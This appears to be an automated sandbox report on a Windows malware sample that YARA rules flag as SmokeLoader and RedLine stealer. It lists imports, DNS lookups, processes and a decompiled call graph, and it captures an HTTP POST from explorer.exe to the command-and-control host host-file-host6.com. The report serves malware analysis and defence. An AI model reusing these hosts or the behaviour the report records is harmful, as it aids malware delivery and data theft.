                  KERNEL32.dllLoadLibraryA, InterlockedPushEntrySList, GetConsoleAliasesW, ReadFile, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, LocalFree, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeA, FindCloseChangeNotification, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoW, LocalSize, FileTimeToDosDateTime, DebugBreak, GlobalGetAtomNameW, IsBadWritePtr, FindResourceA, GetComputerNameExW, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthW, GetVolumeNameForVolumeMountPointA, DeleteVolumeMountPointA, GetCPInfo, PostQueuedCompletionStatus, MoveFileWithProgressA, CopyFileA, lstrcpynW, WriteConsoleW, GetBinaryTypeA, WriteConsoleOutputW, GetCommandLineA, InterlockedIncrement, CreateActCtxW, FormatMessageA, GetModuleHandleW, GetModuleHandleA, LeaveCriticalSection, GetStringTypeExA, OpenMutexW, FindResourceW, RtlCaptureContext, InterlockedExchange, InitializeCriticalSectionAndSpinCount, DeleteFiber, InterlockedExchangeAdd, EnumDateFormatsA, GetPrivateProfileStructA, GetNamedPipeHandleStateW, RegisterWaitForSingleObject, LocalAlloc, QueryMemoryResourceNotification, SetLastError, GetProcessPriorityBoost, GetMailslotInfo, HeapWalk, SetFilePointer, SetConsoleMode, RaiseException, RtlUnwind, GetLastError, MoveFileA, DeleteFileA, GetStartupInfoA, HeapAlloc, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LCMapStringA, LCMapStringW
                  USER32.dllCharUpperBuffW
                  WINHTTP.dllWinHttpCreateUrl
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 3, 2022 16:07:07.615299940 CEST4969780192.168.2.5176.124.192.17
                  Oct 3, 2022 16:07:07.673779011 CEST8049697176.124.192.17192.168.2.5
                  Oct 3, 2022 16:07:07.674664021 CEST4969780192.168.2.5176.124.192.17
                  Oct 3, 2022 16:07:07.674791098 CEST4969780192.168.2.5176.124.192.17
                  Oct 3, 2022 16:07:07.680356026 CEST4969780192.168.2.5176.124.192.17
                  Oct 3, 2022 16:07:07.734281063 CEST8049697176.124.192.17192.168.2.5
                  Oct 3, 2022 16:07:07.739805937 CEST8049697176.124.192.17192.168.2.5
                  Oct 3, 2022 16:07:07.747894049 CEST8049697176.124.192.17192.168.2.5
                  Oct 3, 2022 16:07:07.748110056 CEST4969780192.168.2.5176.124.192.17
                  Oct 3, 2022 16:07:07.749926090 CEST4969780192.168.2.5176.124.192.17
                  Oct 3, 2022 16:07:07.809226036 CEST8049697176.124.192.17192.168.2.5
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 3, 2022 16:07:07.582444906 CEST5689453192.168.2.58.8.8.8
                  Oct 3, 2022 16:07:07.602804899 CEST53568948.8.8.8192.168.2.5
                  Oct 3, 2022 16:07:07.761130095 CEST5029553192.168.2.58.8.8.8
                  Oct 3, 2022 16:07:08.825186014 CEST5029553192.168.2.58.8.8.8
                  Oct 3, 2022 16:07:09.883174896 CEST5029553192.168.2.58.8.8.8
                  Oct 3, 2022 16:07:11.788995981 CEST53502958.8.8.8192.168.2.5
                  Oct 3, 2022 16:07:12.853193045 CEST53502958.8.8.8192.168.2.5
                  Oct 3, 2022 16:07:13.909287930 CEST53502958.8.8.8192.168.2.5
                  TimestampSource IPDest IPChecksumCodeType
                  Oct 3, 2022 16:07:12.853375912 CEST192.168.2.58.8.8.8cff8(Port unreachable)Destination Unreachable
                  Oct 3, 2022 16:07:13.909559011 CEST192.168.2.58.8.8.8cff8(Port unreachable)Destination Unreachable
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 3, 2022 16:07:07.582444906 CEST192.168.2.58.8.8.80x90b8Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
                  Oct 3, 2022 16:07:07.761130095 CEST192.168.2.58.8.8.80xeb27Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                  Oct 3, 2022 16:07:08.825186014 CEST192.168.2.58.8.8.80xeb27Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                  Oct 3, 2022 16:07:09.883174896 CEST192.168.2.58.8.8.80xeb27Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 3, 2022 16:07:07.602804899 CEST8.8.8.8192.168.2.50x90b8No error (0)host-file-host6.com176.124.192.17A (IP address)IN (0x0001)false
                  Oct 3, 2022 16:07:11.788995981 CEST8.8.8.8192.168.2.50xeb27Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                  Oct 3, 2022 16:07:12.853193045 CEST8.8.8.8192.168.2.50xeb27Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                  Oct 3, 2022 16:07:13.909287930 CEST8.8.8.8192.168.2.50xeb27Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
                  • turbbv.com
                    • host-file-host6.com
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.549697176.124.192.1780C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 3, 2022 16:07:07.674791098 CEST104OUTPOST / HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://turbbv.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 195
                  Host: host-file-host6.com
                  Oct 3, 2022 16:07:07.680356026 CEST104OUTData Raw: 10 87 87 e4 6b f8 d0 b1 b9 49 0b 31 7b c2 94 f3 46 65 de 46 d1 32 68 ec c9 ee a8 f6 fd ae 95 83 6c c4 5a a3 19 1d cb e5 ed a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 39 b1 85 68
                  Data Ascii: kI1{FeF2hlZwmEu$f]d9hPJcfQb[o':M5s1A4g&Yp lMQahcW603/Wo36@Pf0vP.rJm|c
                  Oct 3, 2022 16:07:07.747894049 CEST105INHTTP/1.1 200 OK
                  Server: nginx/1.20.1
                  Date: Mon, 03 Oct 2022 14:07:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: fYour IP blocked0


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:16:06:10
                  Start date:03/10/2022
                  Path:C:\Users\user\Desktop\b8E3zd5AYc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\b8E3zd5AYc.exe
                  Imagebase:0x400000
                  File size:147968 bytes
                  MD5 hash:2072A0A726904AED8C39095F36EFD296
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.306092360.00000000008E8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation:low

                  Target ID:1
                  Start time:16:06:13
                  Start date:03/10/2022
                  Path:C:\Users\user\Desktop\b8E3zd5AYc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\b8E3zd5AYc.exe
                  Imagebase:0x400000
                  File size:147968 bytes
                  MD5 hash:2072A0A726904AED8C39095F36EFD296
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.386953278.0000000002051000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.386953278.0000000002051000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:low

                  Target ID:2
                  Start time:16:06:19
                  Start date:03/10/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff69bc80000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.368476198.0000000002951000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000000.368476198.0000000002951000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high

                  Target ID:5
                  Start time:16:07:07
                  Start date:03/10/2022
                  Path:C:\Users\user\AppData\Roaming\vwhdahh
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\vwhdahh
                  Imagebase:0x400000
                  File size:147968 bytes
                  MD5 hash:2072A0A726904AED8C39095F36EFD296
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.426233930.00000000007B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 44%, ReversingLabs
                  • Detection: 37%, Virustotal, Browse
                  Reputation:low

                  Target ID:6
                  Start time:16:07:10
                  Start date:03/10/2022
                  Path:C:\Users\user\AppData\Roaming\vwhdahh
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\vwhdahh
                  Imagebase:0x400000
                  File size:147968 bytes
                  MD5 hash:2072A0A726904AED8C39095F36EFD296
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.437032585.00000000006B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.437032585.00000000006B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.436985446.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.436985446.0000000000640000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:low

                  Reset < >

                    Execution Graph

                    Execution Coverage:6.8%
                    Dynamic/Decrypted Code Coverage:27.8%
                    Signature Coverage:2.5%
                    Total number of Nodes:1574
                    Total number of Limit Nodes:17
                    execution_graph 6720 406880 TlsAlloc 4931 8ec70a 4932 8ec719 4931->4932 4935 8eceaa 4932->4935 4936 8ecec5 4935->4936 4937 8ecece CreateToolhelp32Snapshot 4936->4937 4938 8eceea Module32First 4936->4938 4937->4936 4937->4938 4939 8ecef9 4938->4939 4940 8ec722 4938->4940 4942 8ecb69 4939->4942 4943 8ecb94 4942->4943 4944 8ecba5 VirtualAlloc 4943->4944 4945 8ecbdd 4943->4945 4944->4945 4945->4945 6734 405d44 6735 40494f CallUnexpected 67 API calls 6734->6735 6736 405d4c 6735->6736 6823 409d84 RtlUnwind 6824 408d84 6825 408d96 6824->6825 6827 408da4 @_EH4_CallFilterFunc@8 6824->6827 6826 404c9b TranslatorGuardHandler 5 API calls 6825->6826 6826->6827 4946 406805 4949 406793 TlsGetValue 4946->4949 4950 4067ab 4949->4950 4951 4067cc GetModuleHandleW 4949->4951 4950->4951 4952 4067b5 TlsGetValue 4950->4952 4953 4067e2 4951->4953 4954 4067dc 4951->4954 4956 4067c0 4952->4956 4957 4067c4 4953->4957 4959 4067ff 4953->4959 4960 4070cc 4954->4960 4956->4951 4956->4957 4958 4067f7 RtlEncodePointer 4957->4958 4957->4959 4958->4959 4961 4070d7 Sleep GetModuleHandleW 4960->4961 4962 4070f5 4961->4962 4963 4070f9 4961->4963 4962->4961 4962->4963 4963->4953 6486 40460a 6487 404c9b TranslatorGuardHandler 5 API calls 6486->6487 6488 40461e 6487->6488 6491 4066ad 6488->6491 6492 406a5a __getptd 65 API calls 6491->6492 6493 4066ba 6492->6493 6494 406721 6493->6494 6495 4066fe 6493->6495 6498 404637 6493->6498 6494->6498 6509 406349 6494->6509 6495->6498 6499 405bd2 6495->6499 6500 405bde __setmbcp 6499->6500 6501 406a5a __getptd 65 API calls 6500->6501 6508 405bfe __CallSettingFrame@12 6501->6508 6502 405c73 6503 405c98 ___FrameUnwindToState 65 API calls 6502->6503 6505 405c7f 6503->6505 6504 40499b CallUnexpected 67 API calls 6504->6508 6506 405c89 __setmbcp 6505->6506 6507 40499b CallUnexpected 67 API calls 6505->6507 6506->6498 6507->6506 6508->6502 6508->6504 6510 406368 6509->6510 6511 40499b CallUnexpected 67 API calls 6510->6511 6515 406382 6510->6515 6511->6515 6512 406675 6514 406a5a __getptd 65 API calls 6512->6514 6513 40665c 6588 406255 6513->6588 6518 40667d 6514->6518 6519 406a5a __getptd 65 API calls 6515->6519 6532 40645d FindHandler type_info::operator== ___TypeMatch 6515->6532 6516 40494f CallUnexpected 67 API calls 6516->6532 6520 40668b 6518->6520 6522 40499b CallUnexpected 67 API calls 6518->6522 6521 4063c9 6519->6521 6520->6498 6521->6520 6524 406a5a __getptd 65 API calls 6521->6524 6522->6520 6526 4063db 6524->6526 6527 406a5a __getptd 65 API calls 6526->6527 6530 4063e9 ___BuildCatchObjectHelper 6527->6530 6528 4044fb __CxxThrowException@8 RaiseException 6528->6532 6529 405d76 IsInExceptionSpec 67 API calls 6529->6532 6531 406405 6530->6531 6533 40499b CallUnexpected 67 API calls 6530->6533 6534 40642f 6531->6534 6539 40499b CallUnexpected 67 API calls 6531->6539 6532->6512 6532->6513 6532->6516 6532->6528 6532->6529 6537 406a5a 65 API calls __getptd 6532->6537 6546 405bd2 ___FrameUnwindToState 67 API calls 6532->6546 6554 405ada 6532->6554 6557 4047b3 6532->6557 6563 4061e7 6532->6563 6573 404580 RtlUnwind 6532->6573 6574 405df1 6532->6574 6533->6531 6535 406a5a __getptd 65 API calls 6534->6535 6538 406434 6535->6538 6537->6532 6538->6532 6540 406a5a __getptd 65 API calls 6538->6540 6539->6534 6541 406442 6540->6541 6542 406a5a __getptd 65 API calls 6541->6542 6543 40644d 6542->6543 6548 405d76 6543->6548 6546->6532 6549 405d82 6548->6549 6553 405d8c ___TypeMatch 6548->6553 6550 40499b CallUnexpected 67 API calls 6549->6550 6551 405d87 6550->6551 6552 40494f CallUnexpected 67 API calls 6551->6552 6552->6553 6553->6532 6555 4041fa std::exception::exception 65 API calls 6554->6555 6556 405aeb 6555->6556 6556->6532 6562 4047cc 6557->6562 6558 404802 6559 40481b 6558->6559 6560 40499b CallUnexpected 67 API calls 6558->6560 6559->6532 6560->6559 6561 40499b CallUnexpected 67 API calls 6561->6562 6562->6558 6562->6561 6564 4061ff 6563->6564 6565 4061f2 6563->6565 6608 404580 RtlUnwind 6564->6608 6604 406155 6565->6604 6568 406216 6569 405bd2 ___FrameUnwindToState 67 API calls 6568->6569 6570 406224 6569->6570 6609 405e3a 6570->6609 6572 406245 FindHandlerForForeignException 6572->6532 6573->6532 6575 405dfd __EH_prolog3_catch 6574->6575 6576 406a5a __getptd 65 API calls 6575->6576 6577 405e02 6576->6577 6578 405e10 6577->6578 6579 40499b CallUnexpected 67 API calls 6577->6579 6659 404988 6578->6659 6579->6578 6589 40626c 6588->6589 6599 406344 6588->6599 6590 406a5a __getptd 65 API calls 6589->6590 6591 406272 6590->6591 6592 4062af 6591->6592 6593 406a5a __getptd 65 API calls 6591->6593 6594 4062c8 6592->6594 6596 40499b CallUnexpected 67 API calls 6592->6596 6592->6599 6595 406280 6593->6595 6597 4047b3 _GetRangeOfTrysToCheck 67 API calls 6594->6597 6598 406805 FindHandlerForForeignException 6 API calls 6595->6598 6596->6594 6601 4062dd 6597->6601 6600 40628b 6598->6600 6599->6512 6600->6592 6662 40463d 6600->6662 6601->6599 6603 4061e7 FindHandlerForForeignException 68 API calls 6601->6603 6603->6601 6605 406161 __setmbcp 6604->6605 6623 405fd6 6605->6623 6607 406190 ___BuildCatchObject __setmbcp ___BuildCatchObjectHelper 6607->6564 6608->6568 6610 405e46 __setmbcp 6609->6610 6634 404828 6610->6634 6613 406a5a __getptd 65 API calls 6614 405e71 6613->6614 6615 406a5a __getptd 65 API calls 6614->6615 6616 405e7f 6615->6616 6617 406a5a __getptd 65 API calls 6616->6617 6618 405e8d 6617->6618 6619 406a5a __getptd 65 API calls 6618->6619 6620 405e98 _CallCatchBlock2 6619->6620 6639 405f60 6620->6639 6622 405f4c __setmbcp 6622->6572 6624 405fe2 __setmbcp 6623->6624 6625 406029 ___BuildCatchObjectHelper 6624->6625 6626 4060bf ___BuildCatchObjectHelper 6624->6626 6628 406077 ___BuildCatchObjectHelper 6624->6628 6629 40604f __setmbcp ___BuildCatchObjectHelper 6624->6629 6627 40499b CallUnexpected 67 API calls 6625->6627 6625->6629 6626->6625 6631 4060dc ___BuildCatchObjectHelper 6626->6631 6627->6629 6628->6625 6630 406097 6628->6630 6629->6607 6632 405600 _memmove_s __VEC_memcpy 6630->6632 6633 405600 _memmove_s __VEC_memcpy 6631->6633 6632->6629 6633->6629 6635 406a5a __getptd 65 API calls 6634->6635 6636 40483b 6635->6636 6637 406a5a __getptd 65 API calls 6636->6637 6638 404849 6637->6638 6638->6613 6648 40487b 6639->6648 6642 406a5a __getptd 65 API calls 6643 405f74 6642->6643 6644 406a5a __getptd 65 API calls 6643->6644 6645 405f82 6644->6645 6647 405fc5 FindHandler 6645->6647 6656 404854 6645->6656 6647->6622 6649 406a5a __getptd 65 API calls 6648->6649 6650 404886 6649->6650 6651 404891 6650->6651 6652 4048a2 6650->6652 6653 406a5a __getptd 65 API calls 6651->6653 6654 406a5a __getptd 65 API calls 6652->6654 6655 404896 6653->6655 6654->6655 6655->6642 6657 406a5a __getptd 65 API calls 6656->6657 6658 40485e 6657->6658 6658->6647 6660 406a5a __getptd 65 API calls 6659->6660 6661 40498d 6660->6661 6663 404661 6662->6663 6664 40464f 6662->6664 6665 406a5a __getptd 65 API calls 6663->6665 6664->6592 6665->6664 6671 405eca 6674 405cb3 6671->6674 6673 405ed2 6675 405cf5 6674->6675 6676 405cbd 6674->6676 6675->6673 6676->6675 6677 406a5a __getptd 65 API calls 6676->6677 6678 405ce9 6677->6678 6678->6673 6679 405ed3 6680 406a5a __getptd 65 API calls 6679->6680 6681 405edb 6680->6681 6682 405bd2 ___FrameUnwindToState 67 API calls 6681->6682 6683 405f2b 6682->6683 6684 405f60 FindHandlerForForeignException 65 API calls 6683->6684 6685 405f4c __setmbcp 6684->6685 6402 405c54 6405 405b89 6402->6405 6406 405b9c 6405->6406 6410 405ba8 6405->6410 6408 406a5a __getptd 65 API calls 6406->6408 6412 405bc7 6406->6412 6407 406a5a __getptd 65 API calls 6409 405bb9 6407->6409 6408->6410 6411 406a5a __getptd 65 API calls 6409->6411 6409->6412 6410->6407 6411->6412 6757 404714 6758 404c9b TranslatorGuardHandler 5 API calls 6757->6758 6760 40472a 6758->6760 6759 404735 6760->6759 6761 4066ad ___InternalCxxFrameHandler 69 API calls 6760->6761 6762 40476d 6761->6762 6763 404784 6762->6763 6766 404580 RtlUnwind 6762->6766 6765 40463d _CallSETranslator 65 API calls 6763->6765 6765->6759 6766->6763 6807 4045d4 6808 4066ad ___InternalCxxFrameHandler 69 API calls 6807->6808 6809 4045fa 6808->6809 6686 403cd6 6689 403cdf std::_String_base::_Xlen 6686->6689 6687 403cfa 6688 403b71 std::_String_base::_Xlen 65 API calls 6687->6688 6690 403d05 std::_String_base::_Xlen 6688->6690 6689->6687 6691 403b24 std::_String_base::_Xlen 65 API calls 6689->6691 6691->6687 6767 40431b 6770 40430b 6767->6770 6769 404328 Mailbox 6773 404f22 6770->6773 6772 404319 6772->6769 6774 404f2e __setmbcp 6773->6774 6775 4081fa __lock 65 API calls 6774->6775 6779 404f35 6775->6779 6776 404f6e 6783 404f89 6776->6783 6778 404f7f __setmbcp 6778->6772 6779->6776 6780 404f65 6779->6780 6782 404e94 __setmbcp 65 API calls 6779->6782 6781 404e94 __setmbcp 65 API calls 6780->6781 6781->6776 6782->6780 6786 408120 LeaveCriticalSection 6783->6786 6785 404f90 6785->6778 6786->6785 6413 405c5e 6415 405c09 __CallSettingFrame@12 6413->6415 6414 405c73 6427 405c98 6414->6427 6415->6414 6421 40499b 6415->6421 6419 405c89 __setmbcp 6420 40499b CallUnexpected 67 API calls 6420->6419 6422 4049a7 __setmbcp 6421->6422 6423 40680e __decode_pointer 5 API calls 6422->6423 6426 4049b2 6423->6426 6424 40494f CallUnexpected 67 API calls 6425 4049d2 6424->6425 6426->6424 6428 406a5a __getptd 65 API calls 6427->6428 6429 405c9d 6428->6429 6430 405c7f 6429->6430 6431 406a5a __getptd 65 API calls 6429->6431 6430->6419 6430->6420 6431->6430 6666 405a1f 6667 4091a3 __calloc_crt 65 API calls 6666->6667 6668 405a2b 6667->6668 6669 406793 __encode_pointer 6 API calls 6668->6669 6670 405a33 6669->6670 6727 40a2a3 6728 40a2af SetLastError 6727->6728 6729 40a2b7 __setmbcp 6727->6729 6728->6729 6787 403d26 6788 403b71 std::_String_base::_Xlen 65 API calls 6787->6788 6789 403d33 6788->6789 6790 4044fb __CxxThrowException@8 RaiseException 6789->6790 6791 403d3a 6790->6791 6743 402f67 6746 402f5c 6743->6746 6745 402f72 Mailbox 6747 4042c7 6746->6747 6748 4042db 6747->6748 6749 404e94 __setmbcp 65 API calls 6747->6749 6748->6745 6749->6748 6838 4033a9 6839 4033ab LoadLibraryA 6838->6839 6840 40348d VirtualProtect 6839->6840 6692 4042ea 6695 4042c7 6692->6695 6694 4042f7 Mailbox 6696 4042d3 6695->6696 6697 4042db 6695->6697 6698 404e94 __setmbcp 65 API calls 6696->6698 6697->6694 6698->6697 6435 40ba6c 6436 404c9b TranslatorGuardHandler 5 API calls 6435->6436 6437 40ba7d 6436->6437 6699 406ef0 6700 406f29 6699->6700 6701 406f1c 6699->6701 6703 404c9b TranslatorGuardHandler 5 API calls 6700->6703 6702 404c9b TranslatorGuardHandler 5 API calls 6701->6702 6702->6700 6707 406f39 __except_handler4 __IsNonwritableInCurrentImage 6703->6707 6704 406fbc 6705 406f92 __except_handler4 6705->6704 6706 406fac 6705->6706 6708 404c9b TranslatorGuardHandler 5 API calls 6705->6708 6709 404c9b TranslatorGuardHandler 5 API calls 6706->6709 6707->6704 6707->6705 6715 408e16 RtlUnwind 6707->6715 6708->6706 6709->6704 6711 40700b __except_handler4 6712 40703f 6711->6712 6713 404c9b TranslatorGuardHandler 5 API calls 6711->6713 6714 404c9b TranslatorGuardHandler 5 API calls 6712->6714 6713->6712 6714->6705 6715->6711 6750 404973 6751 404976 6750->6751 6752 406d7c _abort 67 API calls 6751->6752 6753 404982 __setmbcp 6752->6753 6813 403df3 6814 403dcd moneypunct 65 API calls 6813->6814 6815 403dfe Mailbox 6814->6815 6438 406a74 6439 406a80 __setmbcp 6438->6439 6440 406a98 6439->6440 6441 406b82 __setmbcp 6439->6441 6442 404e94 __setmbcp 65 API calls 6439->6442 6443 406aa6 6440->6443 6445 404e94 __setmbcp 65 API calls 6440->6445 6442->6440 6444 406ab4 6443->6444 6446 404e94 __setmbcp 65 API calls 6443->6446 6447 406ac2 6444->6447 6448 404e94 __setmbcp 65 API calls 6444->6448 6445->6443 6446->6444 6449 406ad0 6447->6449 6450 404e94 __setmbcp 65 API calls 6447->6450 6448->6447 6451 406ade 6449->6451 6453 404e94 __setmbcp 65 API calls 6449->6453 6450->6449 6452 406aec 6451->6452 6454 404e94 __setmbcp 65 API calls 6451->6454 6455 406afd 6452->6455 6456 404e94 __setmbcp 65 API calls 6452->6456 6453->6451 6454->6452 6457 4081fa __lock 65 API calls 6455->6457 6456->6455 6458 406b05 6457->6458 6459 406b11 InterlockedDecrement 6458->6459 6460 406b2a 6458->6460 6459->6460 6462 406b1c 6459->6462 6474 406b8e 6460->6474 6462->6460 6465 404e94 __setmbcp 65 API calls 6462->6465 6464 4081fa __lock 65 API calls 6466 406b3e 6464->6466 6465->6460 6467 4094ca ___removelocaleref 8 API calls 6466->6467 6473 406b6f 6466->6473 6471 406b53 6467->6471 6470 404e94 __setmbcp 65 API calls 6470->6441 6472 4092f2 ___freetlocinfo 65 API calls 6471->6472 6471->6473 6472->6473 6477 406b9a 6473->6477 6480 408120 LeaveCriticalSection 6474->6480 6476 406b37 6476->6464 6481 408120 LeaveCriticalSection 6477->6481 6479 406b7c 6479->6470 6480->6476 6481->6479 6792 404135 6795 403dcd 6792->6795 6794 404148 Mailbox 6800 403d3b 6795->6800 6798 4042db 6798->6794 6799 404e94 __setmbcp 65 API calls 6799->6798 6801 403b71 std::_String_base::_Xlen 65 API calls 6800->6801 6802 403d44 6801->6802 6802->6798 6802->6799 6730 403cb6 6731 403b13 std::_String_base::_Xlen 73 API calls 6730->6731 6732 403ccd 6731->6732 6816 404bf7 6819 407ee2 6816->6819 6818 404bfc 6818->6818 6820 407f14 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6819->6820 6821 407f07 6819->6821 6822 407f0b 6820->6822 6821->6820 6821->6822 6822->6818 6716 402ef8 6717 402f40 6716->6717 6718 4041fa std::exception::exception 65 API calls 6717->6718 6719 402f4f 6718->6719 6841 404bb8 6842 404bc7 6841->6842 6843 404bcd 6841->6843 6845 407382 _abort 65 API calls 6842->6845 6847 4073a7 6843->6847 6845->6843 6846 404bd2 __setmbcp 6848 407240 _doexit 65 API calls 6847->6848 6849 4073b2 6848->6849 6849->6846 4964 404a79 5003 406e94 4964->5003 4966 404a85 GetStartupInfoA 4967 404aa8 4966->4967 5004 407eb2 HeapCreate 4967->5004 4970 404af8 5006 406ba3 GetModuleHandleW 4970->5006 4974 404b09 __RTC_Initialize 5040 407c12 4974->5040 4975 404a50 _fast_error_exit 65 API calls 4975->4974 4977 404b17 4978 404b23 GetCommandLineA 4977->4978 5142 4070fc 4977->5142 5055 407adb 4978->5055 4985 404b48 5091 4077a8 4985->5091 4986 4070fc __amsg_exit 65 API calls 4986->4985 4989 404b59 5106 4071bb 4989->5106 4990 4070fc __amsg_exit 65 API calls 4990->4989 4992 404b60 4993 404b6b 4992->4993 4994 4070fc __amsg_exit 65 API calls 4992->4994 5112 407749 4993->5112 4994->4993 4999 404b9a 5152 407398 4999->5152 5002 404b9f __setmbcp 5003->4966 5005 404aec 5004->5005 5005->4970 5134 404a50 5005->5134 5007 406bb7 5006->5007 5008 406bbe 5006->5008 5009 4070cc __crt_waiting_on_module_handle 2 API calls 5007->5009 5010 406d26 5008->5010 5011 406bc8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5008->5011 5013 406bbd 5009->5013 5198 4068bd 5010->5198 5014 406c11 TlsAlloc 5011->5014 5013->5008 5016 404afe 5014->5016 5017 406c5f TlsSetValue 5014->5017 5016->4974 5016->4975 5017->5016 5018 406c70 5017->5018 5155 4073b6 5018->5155 5021 406793 __encode_pointer 6 API calls 5022 406c80 5021->5022 5023 406793 __encode_pointer 6 API calls 5022->5023 5024 406c90 5023->5024 5025 406793 __encode_pointer 6 API calls 5024->5025 5026 406ca0 5025->5026 5027 406793 __encode_pointer 6 API calls 5026->5027 5028 406cb0 5027->5028 5162 40807e 5028->5162 5035 40680e __decode_pointer 5 API calls 5036 406d04 5035->5036 5036->5010 5037 406d0b 5036->5037 5180 4068fa 5037->5180 5039 406d13 GetCurrentThreadId 5039->5016 5530 406e94 5040->5530 5042 407c1e GetStartupInfoA 5043 4091a3 __calloc_crt 65 API calls 5042->5043 5049 407c3f 5043->5049 5044 407e5d __setmbcp 5044->4977 5045 407dda GetStdHandle 5050 407da4 5045->5050 5046 407e3f SetHandleCount 5046->5044 5047 4091a3 __calloc_crt 65 API calls 5047->5049 5048 407dec GetFileType 5048->5050 5049->5044 5049->5047 5049->5050 5052 407d27 5049->5052 5050->5044 5050->5045 5050->5046 5050->5048 5053 40a26b __mtinitlocknum InitializeCriticalSectionAndSpinCount 5050->5053 5051 407d50 GetFileType 5051->5052 5052->5044 5052->5050 